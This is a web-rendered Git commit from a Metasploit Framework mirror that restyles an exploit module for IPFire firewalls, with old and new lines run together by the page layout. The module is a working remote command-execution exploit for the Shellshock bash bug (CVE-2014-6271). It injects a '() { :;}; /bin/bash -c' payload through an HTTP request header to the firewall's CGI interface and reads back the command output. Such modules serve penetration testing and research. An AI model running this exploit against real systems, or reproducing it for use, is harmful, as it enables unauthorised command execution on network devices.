infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Suggested updates for style and clarity

bug/bundler_fix
Brendan Watters 2016-06-03 14:04:58 -05:00
parent 9b5e3010ef
commit d7cd10f586
1 changed files with 57 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

115
modules/exploits/linux/http/ipfire_bashbug_exec.rb
View File

@ -6,73 +6,75 @@
require 'msf/core' require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)', update_info(
'Description' => %q{ info,
IPFire, a free linux based open source firewall distribution, 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
version <= 2.15 Update Core 82 contains an authenticated remote 'Description' => %q(
command execution vulnerability via shellshock in the request headers. IPFire, a free linux based open source firewall distribution,
}, version <= 2.15 Update Core 82 contains an authenticated remote
'Author' => command execution vulnerability via shellshock in the request headers.
[ ),
'h00die <mike@stcyrsecurity.com>', # module 'Author' =>
'Claudio Viviani' # discovery [
], 'h00die <mike@stcyrsecurity.com>', # module
'References' => 'Claudio Viviani' # discovery
[ ],
[ 'URL', 'https://www.exploit-db.com/exploits/34839/' ], 'References' =>
[ 'CVE', '2014-6271'] [
], [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
'License' => MSF_LICENSE, [ 'CVE', '2014-6271']
'Platform' => %w{ linux unix }, ],
'Privileged' => false, 'License' => MSF_LICENSE,
'DefaultOptions' => 'Platform' => %w( linux unix ),
{ 'Privileged' => false,
'SSL' => true, 'DefaultOptions' =>
'PAYLOAD' => 'cmd/unix/generic' {
}, 'SSL' => true,
'Arch' => ARCH_CMD, 'PAYLOAD' => 'cmd/unix/generic'
'Payload' => },
{ 'Arch' => ARCH_CMD,
'Compat' => 'Payload' =>
{ {
'PayloadType' => 'cmd', 'Compat' =>
'RequiredCmd' => 'generic' {
} 'PayloadType' => 'cmd',
}, 'RequiredCmd' => 'generic'
'Targets' => }
[ },
[ 'Automatic Target', { }] 'Targets' =>
], [
'DefaultTarget' => 0, [ 'Automatic Target', {}]
'DisclosureDate' => 'Sep 29 2014' ],
)) 'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
)
)
register_options( register_options(
[ [
OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']), OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444) Opt::RPORT(444)
], self.class) ], self.class
)
end end
def check() def check
begin begin
res = send_request_cgi({ res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi', 'uri' => '/cgi-bin/index.cgi',
'method' => 'GET', 'method' => 'GET'
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']), )
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
if version && update && version == "2.15" && update.to_i < 83 if version && update && version == "2.15" && update.to_i < 83
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Appears
else else
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
@ -88,23 +90,20 @@ class MetasploitModule < Msf::Exploit::Remote
%{() { :;}; /bin/bash -c "#{cmd}" } %{() { :;}; /bin/bash -c "#{cmd}" }
end end
def exploit() def exploit
begin begin
payload = cve_2014_6271(datastore['CMD']) payload = cve_2014_6271(datastore['CMD'])
vprint_status("Exploiting with payload: #{payload}" ) vprint_status("Exploiting with payload: #{payload}")
res = send_request_cgi({ res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi', 'uri' => '/cgi-bin/index.cgi',
'method' => 'GET', 'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']), 'headers' => { 'VULN' => payload }
'headers' => {'VULN' => payload} )
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401 fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body /<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
if output print_good(output) unless output.nil?
print_good(output)
end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")